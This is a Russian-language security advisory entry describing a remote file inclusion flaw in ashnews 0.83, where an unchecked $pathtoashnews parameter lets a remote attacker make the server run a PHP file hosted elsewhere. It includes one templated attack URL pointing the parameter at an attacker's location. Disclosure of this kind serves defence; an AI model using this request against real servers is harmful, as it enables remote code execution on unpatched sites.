Дата публикации: | 25.07.2003 |
Всего просмотров: | 2423 |
Опасность: | Высокая |
Наличие исправления: | Нет |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Удаленная |
Воздействие: |
Межсайтовый скриптинг Компрометация системы |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | ashnews 0.x |
Описание: | Уязвимость включения файла обнаружена в ashnews. Удаленный пользователь может выполнить произвольные PHP команды на целевом сервере. Сценарии 'ashnews.php' и 'ashheadlines.php' включают файл 'ashprojects/newsconfig.php' в переменной $pathtoashnews, не проверяя правильность определения этой переменной. В результате удаленный пользователь может определить удаленное местоположение для $pathtoashnews каталога, чтобы включить произвольный файл 'ashprojects/newsconfig.php', расположенный на сервере атакующего, который будет выполнен на целевой системе с привилегиями Web сервера. Пример: http://[target]/[ashweb dir]/ashnews.php?pathtoashnews=[remote location] Уязвимость обнаружена в ashnews 0.83 Способов устранения обнаруженной уязвимости не существует в настоящее время. |
Ссылки: | Corrected AshNews Vulnderability |